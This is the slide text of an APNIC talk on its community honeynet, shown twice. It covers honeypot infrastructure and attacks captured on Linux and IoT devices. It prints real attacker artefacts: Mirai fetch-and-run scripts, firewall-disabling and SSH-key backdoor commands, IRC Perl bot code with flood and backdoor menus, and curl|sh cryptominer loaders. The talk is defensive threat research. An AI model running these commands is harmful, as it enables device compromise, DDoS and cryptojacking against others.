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Observations and Lessons Learned from
the APNIC Community Honeynet Project
Adli Wahid
Senior Internet Security Specialist, APNIC
Let’s Connect!
LinkedIn: Adli Wahid
Twitter: @adliwahid
PGP Key fingerprint = 0CA9 A0A3 42C0
241E 6AE9 B24C 53F7 CE5C 6352 3696
Talk Overview
1. APNIC Community Honeynet
2. Observations on activities
targeting Linux servers and
3. Lessons Learned /
Overview of the APNIC
Community Honeynet Project
APNIC Community Honeynet Project
• Context
– Educational – using honeypots for understanding network security attacks / threats, part
of our network security training
– Situational awareness, the bigger picture, cooperation with other stakeholders, tools (i.e.
MISP threat sharing platform, Wireshark, Suricata, etc )
• Collaboration
– Partners deploy honeypots, APNIC runs the backend
– Information collected among partners & threat sharing*
• Outcomes
– More than 50 distributed honeypots* in AP region since 2017
– Share threat information for APNIC members, partners (i.e CERTs/CSIRTs, Network
APNIC Community Honeypot
1. Purpose and Placement
o Research & Alerting – Internet
2. Type of Honeypots
o Cowrie, Dionaea, RDPHoney,
3. Deployment
– Community Honey Network (fork of Modern Honey Network)
– Partners & Self Hosting
4. Data Collection & Analysis & Action
– Logs, Visualization, Alert, Action (Incident Response)
– Elasticsearch, Kibana, Logstash, Beats
– Suricata IDS
– ElastAlert + Slack
5. Maintenance
– Ansible
– LibreNMS
Detection with Suricata Rulesets
Slack Alert
Community Honeynet Infrastructure
Filebeats (json)
Filebeats (json)
Elastalert Kibana
Distributed honeypots
MHN – Modern Honey Network
CHN – Community HoneyNetwork
* Traffic from the last 30 days
Country View – Pakistan (Last 90 days)
Observations and Lessons
Linux/Unix Malware
• Routers / IoT devices / Servers run Linux / Unix based OS
• Not new but pervasive
– Targets are exposed on the Internet (http, telnet, ssh)
– Unpatched / Unmonitored (i.e. no Anti Virus, firmware upgrades not applied)
– Default/Weak credentials
• Popular example – Mirai (ddos agent)
– Source code was shared publicly
– Many variants – josho, owari, masuta, sora etc
– Gafgyt
• Simple technique of infecting and spreading & persistence
• Interesting Scenarios
– Working from Home
– Servers / Hosting / Cloud
Different Perspectives of a DDoS
My Network /
Infrastructure /
Target / Victim Perspective
Attacker Perspective
Service & Attacker
• Setting up the infrastructure
• Misconfigured services
– Servers - NTP, DNS, SSDP, etc
– Amplification attack
– Spoof source of request
• Active bot “recruitment”
– Internet exposed services
– Vulnerable devices
– Weak credentials
Brute force:
Username: admin password:12345
Remote Code Execution via Web interface
Download Binary /
Scan and gain access
Connect to Command and Control C & C
“Recruitment Process”
wget http://37.x.2x.190:80/13747243572475/hx86_64
Telnet/SSH Honeypot (Cowrie)
• Emulates SSH / Telnet
– Allows attacker to log in
• Emulates Linux/Unix environment
– Captures command issued by attacker after
– Including download
• ”Look and Feel” of Linux/Unix server
and IoT devices
• Attract certain class of attacks
– Scan for SSH/Telnet
– Bruteforce username/password
– Login & execute payload(s)
• Ddos Agents & Cryptominers
– Based on post-login activities and binary
Mirai sample – 2016
Successful Logins – New Honeypot
"eventid": "cowrie.login.success",
"username": "root",
"timestamp": "2018-10-07T19:31:50.568233Z",
"message": "login attempt
[root/taZz@23495859] succeeded",
"src_ip": "123.b.c.12",
"session": "fd7977b0b54a",
"password": "taZz@23495859",
"sensor": "mn-001"
"eventid": "cowrie.login.success",
"username": "root",
"timestamp": "2018-10-07T19:31:59.378766Z",
"message": "login attempt
[root/taZz@23495859] succeeded",
"src_ip": "80.x.y.62",
"session": "fdcd399b1282",
"password": "taZz@23495859",
"sensor": "mn-001"
Check out:
Execute Payload
cd /tmp || cd /honme/$USER || cd /var/run || cd /mnt
|| cd /root || cd /
wget -O
mirai.mips; busybox wget -O mirai.mips;
tftp -r mirai.mips -g; busybox tftp -r
mirai.mips -g; chmod 777 mirai.mips;
./bins/mirai.mips; rm -rf mirai.mips
/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -
c;chmod 777 dx;./dx;echo "cd /tmp/">>/etc/rc.local;echo
"./dx&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa
AySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
echo -e "passwordn1o53kTj3yZq9n1o53kTj3yZq9"|passwd|bash
system scheduler add name="U6" interval=10m on-event="/tool fetch
url= mode=http dst-
path=7wmp0b4s.rscrn/import 7wmp0b4s.rsc"
my $process = $rps[rand scalar @rps];
my @rversion = ("Phl4nk");
my $vers = $rversion[rand scalar @rversion];
my @rircname = ("zombie");
my $ircname = $rircname[rand scalar
chop (my $realname = $rircname[rand scalar
my $nick =$rircname[rand scalar @rircname];
my $server = '125.x.y.z53';
my $port = '1947';
my $linas_max='8';
my $sleep='5';
my $homedir = "/tmp";
my $version = 'v.02';
my @admins = ("Nite","NiteMax","Nite123");
#my @hostauth = ("Nite");
my @channels = ("#VPS");
Perl Script
command: uname -a & curl -O http://[xx] ; perl adm.txt ; rm -rf adm.txt
if ($funcarg =~ /^flood/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1========================================= ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1redu`s PerlBot Flood Help: ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1========================================= ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1udp1 <ip> <port> <time> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1udp2 <ip> <packet size> <time> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1udp3 <ip> <port> <time> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1tcp <ip> <port> <packet size> <time> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1http <site> <time> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1ctcpflood <nick> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1msgflood <nick> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1noticeflood <nick> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1========================================= ");
if ($funcarg =~ /^utils/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1==================================================
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1redu`s PerlBot Utils Help:
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1==================================================
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1cback <ip> <port>
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1download <url+path> <file>
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1mail <subject> <sender> <recipient> <messa
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1dns <ip>
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1port <ip> <port>
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1portscan <ip>
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u pwd (for example)
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1==================================================
* Non-spoof / non-root attacks: (can run on all bots) *
* STD <ip> <port> <time> = A non spoof UDP HIV STD flooder *
* HOLD <host> <port> <time> = A vanilla TCP connection flooder *
* JUNK <host> <port> <time> = A vanilla TCP flooder (modded) *
* UNKNOWN <target> <port, 0 for random> <packet size, 0 for random> <secs> = Another non-
spoof udp flooder
* HTTP <method> <target> <port> <path> <time> <power> = An extremely powerful HTTP flooder
* *
* Spoof / root attacks: *
* DNS <target IP> <port> <reflection file url> <forks> <pps limiter, -1 for no limit> <time> = DNS
amplification flooder, use with caution
* BLACKNURSE <target ip> <secs> = An ICMP flooder that will crash most firewalls, causing them
to drop packets.
* *
* Bot commands: *
* AK-47SCAN <ON/OFF> = Toggles scanner. Started automatically. *
* GETIP <iface> = gets the IP address from an interface *
* FASTFLUX <iface> <ip> <port> = starts a proxy to a port on another ip to an interface (same port)
* RNDNICK = Randomizes knight nickname *
* NICK <nick> = Changes the nick of the client *
* SERVER <server> = Changes servers *
* GETSPOOFS = Gets the current spoofing *
* SPOOFS <subnet> = Changes spoofing to a subnet *
* DISABLE = Disables all packeting from the knight *
* ENABLE = Enables all packeting from the knight *
* KILL = Kills the knight *
* GET <http address> <save as> = Downloads a file off the web *
* VERSION = Requests version of knight *
* KILLALL = Kills all current packeting *
* HELP = Displays this *
* IRC <command> = Sends this command to the server *
* SH <command> = Executes a command *
* BASH <command> = Run a bash command *
* ISH <command> = Interactive SH (via privmsg) *
* SHD <command> = Daemonize command *
* INSTALL <http://server/bin> = Install binary (via wget) *
* BINUPDATE <http://server/bin> = Update a binary (via wget) *
* LOCKUP <http://server/bin> = Kill telnet, install a backdoor! *
* *
Source code of IRC based bot
Linux/Mirai – Fbot
2020-07-16T10:47:34.498718Z - URL seen
http://5.x.y.228/bot.x86_64 on sensor 4da092c7-7234-48dc-a7ab-
7eb35979e847 and source ip: x.y.z.119 - ['root', 'juantech’]
2020-07-16T11:43:13.797645Z - http://5.x.y.228/bot.x86_64 on
sensor f3fedbcf-e79e-44ef-9947-aca33701f8c2 and source ip:
x.y.z.97 - ['root', 'hipc3518’]
Cryptominers / Cryptojacking
curl -fsSL||wget -q -O-|sh >/dev/null 2>&1 &
Snippet of shell script
if [ ! -f "4d867bd38706a5f7" ]; then
ARCH=$(getconf LONG_BIT)
if [ ${ARCH}x = "64x" ]; then
(curl -fsSL -m180 -o
||wget -T180 -q -O 4d867bd38706a5f7
||curl -fsSL -m180 -o 4d867bd38706a5f7
||wget -T180 -q -O 4d867bd38706a5f7
||curl -fsSL -m180 -o
||wget -T180 -q -O
Find hash related to
URL serving Malware
Rocke Gang
24916 (May 2019)
mining-challengers (May 2019)
tactics-now-more-difficult-to-detect (Oct 2019)
evade-detection-by-cloud-security-products/ (Oct 2019)
www-data 17838 0.0 0.0 4452 636 ? S
Mar20 0:00 sh -c /bin/bash -i -c '( while true ; do
-l /var/www/[truncated]/files/media-icons/out.txt -o -u
Xi83P4uEoGyD5eTc.0+10000 -k >&
/dev/udp/ 0>&1 ; if [ ! -f
/var/www/[truncated]/files/media-icons/xm2sg ] || [ $?
-eq 126 ]; then break; fi; sleep 1 ; done )
Analysis - Interesting indicators
• IP addresses of host for initial access, run script to download
– Normally compromised systems
• IP addresses of host serving binary/malware + other artefacts
• IP addresses/domains of command and control
• Binaries, scripts, malware samples, source code (+ hashes)
• Ssh keys, webshells, Group names, irc #channels
• Miner related information
• Correlate with other observations, reports, etc
Lessons Learned
Lessons Learned
• Context how can we “ improve” security ?
• Bad Practices
o Telnet enabled by default on devices
o Weak or default credentials not removed
o Services not developed securely
o Services not deployed securely (i.e. management interfaces
shouldn’t be exposed on the Internet)
o No action upon notification (not our device, it is the customers)
• Miscreants will exploit the weaknesess & monetize
Source IP from TO
2020-10-16T06:53:37.404513Z - cowrie : Traffic from IP
address: x.z.y.56 src_port: 33903 dest_port: 23 ASN
Info: XYZ , 38201 , x.z.y.0/21
Back to the drawing Board?
• Keeping the Internet safe and secure for _everyone_
• Education
– Users, operators, developers
• Governance
– Incident Response
– Roles and responsibilities
– Accountabilities
Thank You!
LinkedIn: Adli Wahid
Twitter: @adliwahid
PGP: 0CA9 A0A3 42C0 241E 6AE9 B24C 53F7 CE5C 6352

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IBCAST 2021: Observations and lessons learned from the APNIC Community Honeynet Project

  • 1. 1 Observations and Lessons Learned from the APNIC Community Honeynet Project Adli Wahid Senior Internet Security Specialist, APNIC
  • 2. 2 2 Let’s Connect! LinkedIn: Adli Wahid Email: Twitter: @adliwahid PGP Key fingerprint = 0CA9 A0A3 42C0 241E 6AE9 B24C 53F7 CE5C 6352 3696
  • 3. 3 3 Talk Overview 1. APNIC Community Honeynet Project 2. Observations on activities targeting Linux servers and IoTs 3. Lessons Learned / Reflections
  • 4. 4 4 Overview of the APNIC Community Honeynet Project
  • 5. 5 5 APNIC Community Honeynet Project • Context – Educational – using honeypots for understanding network security attacks / threats, part of our network security training – Situational awareness, the bigger picture, cooperation with other stakeholders, tools (i.e. MISP threat sharing platform, Wireshark, Suricata, etc ) • Collaboration – Partners deploy honeypots, APNIC runs the backend – Information collected among partners & threat sharing* • Outcomes – More than 50 distributed honeypots* in AP region since 2017 – Share threat information for APNIC members, partners (i.e CERTs/CSIRTs, Network Operators) • the-scenes/ • 5
  • 6. 6 6 APNIC Community Honeypot 1. Purpose and Placement o Research & Alerting – Internet 2. Type of Honeypots o Cowrie, Dionaea, RDPHoney, 3. Deployment – Community Honey Network (fork of Modern Honey Network) – Partners & Self Hosting 4. Data Collection & Analysis & Action – Logs, Visualization, Alert, Action (Incident Response) – Elasticsearch, Kibana, Logstash, Beats – Suricata IDS – ElastAlert + Slack 5. Maintenance – Ansible – LibreNMS Detection with Suricata Rulesets Slack Alert
  • 7. 7 7 Community Honeynet Infrastructure hpfeeds hpfeeds CHN MHN Filebeats (json) Filebeats (json) Logstash TLS TLS ElasticSear ch BigQuery Elastalert Kibana honeypots Distributed honeypots MHN – Modern Honey Network CHN – Community HoneyNetwork
  • 8. 8 8 * Traffic from the last 30 days
  • 9. 9 9
  • 10. 10 10
  • 11. 11 Country View – Pakistan (Last 90 days)
  • 13. 13 13 Linux/Unix Malware • Routers / IoT devices / Servers run Linux / Unix based OS • Not new but pervasive – Targets are exposed on the Internet (http, telnet, ssh) – Unpatched / Unmonitored (i.e. no Anti Virus, firmware upgrades not applied) – Default/Weak credentials • Popular example – Mirai (ddos agent) – Source code was shared publicly – Many variants – josho, owari, masuta, sora etc – Gafgyt • Simple technique of infecting and spreading & persistence • Interesting Scenarios – Working from Home – Servers / Hosting / Cloud
  • 14. 14 14 Different Perspectives of a DDoS My Network / Infrastructure / Host Source Target / Victim Perspective Attacker Perspective x
  • 15. 15 15 Service & Attacker Infrastructure • Setting up the infrastructure • Misconfigured services – Servers - NTP, DNS, SSDP, etc – Amplification attack – Spoof source of request – – do/network-reporting/get-reports • Active bot “recruitment” – Internet exposed services – Vulnerable devices – Weak credentials
  • 16. 18 18 source Brute force: Username: admin password:12345 Remote Code Execution via Web interface Download Binary / Execute Scan and gain access Connect to Command and Control C & C “Recruitment Process” wget http://37.x.2x.190:80/13747243572475/hx86_64 2 1 Attacker
  • 17. 19 19 Telnet/SSH Honeypot (Cowrie) • Emulates SSH / Telnet – Allows attacker to log in • Emulates Linux/Unix environment – Captures command issued by attacker after login – Including download • ”Look and Feel” of Linux/Unix server and IoT devices • Attract certain class of attacks – Scan for SSH/Telnet – Bruteforce username/password – Login & execute payload(s) • Ddos Agents & Cryptominers – Based on post-login activities and binary collected Mirai sample – 2016
  • 18. 20 Successful Logins – New Honeypot { "eventid": "cowrie.login.success", "username": "root", "timestamp": "2018-10-07T19:31:50.568233Z", "message": "login attempt [root/taZz@23495859] succeeded", "src_ip": "123.b.c.12", "session": "fd7977b0b54a", "password": "taZz@23495859", "sensor": "mn-001" } { "eventid": "cowrie.login.success", "username": "root", "timestamp": "2018-10-07T19:31:59.378766Z", "message": "login attempt [root/taZz@23495859] succeeded", "src_ip": "80.x.y.62", "session": "fdcd399b1282", "password": "taZz@23495859", "sensor": "mn-001" } Check out:
  • 19. 21 21 Execute Payload #!/bin/sh cd /tmp || cd /honme/$USER || cd /var/run || cd /mnt || cd /root || cd / wget -O mirai.mips; busybox wget -O mirai.mips; tftp -r mirai.mips -g; busybox tftp -r mirai.mips -g; chmod 777 mirai.mips; ./bins/mirai.mips; rm -rf mirai.mips
  • 20. 22 22 /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget - c;chmod 777 dx;./dx;echo "cd /tmp/">>/etc/rc.local;echo "./dx&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5 O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJ e0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPe cjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8h Gmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKg AySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ echo -e "passwordn1o53kTj3yZq9n1o53kTj3yZq9"|passwd|bash system scheduler add name="U6" interval=10m on-event="/tool fetch url= mode=http dst- path=7wmp0b4s.rscrn/import 7wmp0b4s.rsc" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,wri te
  • 21. 23 my $process = $rps[rand scalar @rps]; my @rversion = ("Phl4nk"); my $vers = $rversion[rand scalar @rversion]; my @rircname = ("zombie"); my $ircname = $rircname[rand scalar @rircname]; chop (my $realname = $rircname[rand scalar @rircname]); my $nick =$rircname[rand scalar @rircname]; my $server = '125.x.y.z53'; my $port = '1947'; my $linas_max='8'; my $sleep='5'; my $homedir = "/tmp"; my $version = 'v.02'; my @admins = ("Nite","NiteMax","Nite123"); #my @hostauth = ("Nite"); my @channels = ("#VPS"); Perl Script command: uname -a & curl -O http://[xx] ; perl adm.txt ; rm -rf adm.txt
  • 22. 24 24 if ($funcarg =~ /^flood/) { sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1========================================= "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1redu`s PerlBot Flood Help: "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1========================================= "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1udp1 <ip> <port> <time> "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1udp2 <ip> <packet size> <time> "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1udp3 <ip> <port> <time> "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1tcp <ip> <port> <packet size> <time> "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1http <site> <time> "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1ctcpflood <nick> "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1msgflood <nick> "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1noticeflood <nick> "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1========================================= "); } if ($funcarg =~ /^utils/) { sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1================================================== sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1redu`s PerlBot Utils Help: sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1================================================== sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1cback <ip> <port> sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1download <url+path> <file> sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1mail <subject> <sender> <recipient> <messa sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1dns <ip> sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1port <ip> <port> sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1portscan <ip> sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u pwd (for example) sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1================================================== }
  • 23. 25 * Non-spoof / non-root attacks: (can run on all bots) * * STD <ip> <port> <time> = A non spoof UDP HIV STD flooder * * HOLD <host> <port> <time> = A vanilla TCP connection flooder * * JUNK <host> <port> <time> = A vanilla TCP flooder (modded) * * UNKNOWN <target> <port, 0 for random> <packet size, 0 for random> <secs> = Another non- spoof udp flooder * HTTP <method> <target> <port> <path> <time> <power> = An extremely powerful HTTP flooder * * * Spoof / root attacks: * * DNS <target IP> <port> <reflection file url> <forks> <pps limiter, -1 for no limit> <time> = DNS amplification flooder, use with caution * BLACKNURSE <target ip> <secs> = An ICMP flooder that will crash most firewalls, causing them to drop packets. * * * Bot commands: * * AK-47SCAN <ON/OFF> = Toggles scanner. Started automatically. * * GETIP <iface> = gets the IP address from an interface * * FASTFLUX <iface> <ip> <port> = starts a proxy to a port on another ip to an interface (same port) * RNDNICK = Randomizes knight nickname * * NICK <nick> = Changes the nick of the client * * SERVER <server> = Changes servers * * GETSPOOFS = Gets the current spoofing * * SPOOFS <subnet> = Changes spoofing to a subnet * * DISABLE = Disables all packeting from the knight * * ENABLE = Enables all packeting from the knight * * KILL = Kills the knight * * GET <http address> <save as> = Downloads a file off the web * * VERSION = Requests version of knight * * KILLALL = Kills all current packeting * * HELP = Displays this * * IRC <command> = Sends this command to the server * * SH <command> = Executes a command * * BASH <command> = Run a bash command * * ISH <command> = Interactive SH (via privmsg) * * SHD <command> = Daemonize command * * INSTALL <http://server/bin> = Install binary (via wget) * * BINUPDATE <http://server/bin> = Update a binary (via wget) * * LOCKUP <http://server/bin> = Kill telnet, install a backdoor! * * * Source code of IRC based bot
  • 24. 26 26 Linux/Mirai – Fbot linuxmirai-fbot-re.html 2020-07-16T10:47:34.498718Z - URL seen http://5.x.y.228/bot.x86_64 on sensor 4da092c7-7234-48dc-a7ab- 7eb35979e847 and source ip: x.y.z.119 - ['root', 'juantech’] 2020-07-16T11:43:13.797645Z - http://5.x.y.228/bot.x86_64 on sensor f3fedbcf-e79e-44ef-9947-aca33701f8c2 and source ip: x.y.z.97 - ['root', 'hipc3518’]
  • 25. 27 27
  • 27. 31 31 curl -fsSL||wget -q -O-|sh >/dev/null 2>&1 &
  • 28. 32 32 Snippet of shell script if [ ! -f "4d867bd38706a5f7" ]; then ARCH=$(getconf LONG_BIT) if [ ${ARCH}x = "64x" ]; then (curl -fsSL -m180 -o 4d867bd38706a5f7 ||wget -T180 -q -O 4d867bd38706a5f7 ||curl -fsSL -m180 -o 4d867bd38706a5f7 ||wget -T180 -q -O 4d867bd38706a5f7 ||curl -fsSL -m180 -o 4d867bd38706a5f7 ||wget -T180 -q -O 4d867bd38706a5f7)
  • 29. 33 33 Find hash related to URL serving Malware a5fba021a41c520a81647cda41110033eba 4f8842eb3239f227bcbb0b1b110d6
  • 30. 34 34
  • 31. 35 35 Rocke Gang 1. 24916 (May 2019) 2. mining-challengers (May 2019) 3. tactics-now-more-difficult-to-detect (Oct 2019) 4. evade-detection-by-cloud-security-products/ (Oct 2019)
  • 32. 36 36 www-data 17838 0.0 0.0 4452 636 ? S Mar20 0:00 sh -c /bin/bash -i -c '( while true ; do /var/www/[truncated]default/files/media-icons/xm2sg -l /var/www/[truncated]/files/media-icons/out.txt -o -u 49DmzgK76Bo8WUa4LzTMs9TuT4Pj5FwM4FKuaN R1LmNvSPbPcTFi1ZsbVjJcQDY5hZ9i18A88g86Tfd Xi83P4uEoGyD5eTc.0+10000 -k >& /dev/udp/ 0>&1 ; if [ ! -f /var/www/[truncated]/files/media-icons/xm2sg ] || [ $? -eq 126 ]; then break; fi; sleep 1 ; done )
  • 33. 37 37 Analysis - Interesting indicators • IP addresses of host for initial access, run script to download binary/malware – Normally compromised systems • IP addresses of host serving binary/malware + other artefacts • IP addresses/domains of command and control • Binaries, scripts, malware samples, source code (+ hashes) • Ssh keys, webshells, Group names, irc #channels • Miner related information • Correlate with other observations, reports, etc
  • 35. 39 39 Lessons Learned • Context how can we “ improve” security ? • Bad Practices o Telnet enabled by default on devices o Weak or default credentials not removed o Services not developed securely o Services not deployed securely (i.e. management interfaces shouldn’t be exposed on the Internet) o No action upon notification (not our device, it is the customers) • Miscreants will exploit the weaknesess & monetize
  • 36. 45 45 Source IP from TO 2020-10-16T06:53:37.404513Z - cowrie : Traffic from IP address: x.z.y.56 src_port: 33903 dest_port: 23 ASN Info: XYZ , 38201 , x.z.y.0/21 AbuseIPDB
  • 37. 46 46 Back to the drawing Board? • Keeping the Internet safe and secure for _everyone_ • Education – Users, operators, developers • Governance – Incident Response – Roles and responsibilities – Accountabilities
  • 38. 48 Thank You! LinkedIn: Adli Wahid Email: Twitter: @adliwahid PGP: 0CA9 A0A3 42C0 241E 6AE9 B24C 53F7 CE5C 6352 3696